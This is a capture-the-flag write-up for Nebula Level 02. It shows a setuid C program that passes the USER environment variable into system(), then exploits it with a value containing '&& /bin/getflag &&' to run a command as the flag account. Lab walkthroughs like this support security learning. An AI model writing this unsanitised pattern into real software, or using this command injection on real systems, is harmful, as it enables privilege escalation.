Nebula Level 02

Level 02 instructions

About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}


This looks like another simple C program that I need to trick. On line 22 a shell command is constructed using the USER environment variable, and on line 25 that command is executed with system(). Since I control the USER environment variable, I should be able to control the command.
In bash you can chain commands together using &&, so I set my USER variable to chain a couple of commands together.

export USER='&& /bin/getflag &&'

Now when the program runs, it should construct a command that looks like this:

/bin/echo && /bin/getflag && is cool

When this is executed, it should first run “/bin/echo” with no parameters, next run “/bin/getflag”, and finally try to run “is cool”, which will just fail since it’s not a valid command. Because this program has the setuid flag set, all of this runs as the flag02 user.

/home/flag02/flag02 
about to call system("/bin/echo && /bin/getflag && is cool")

You have successfully executed getflag on a target account
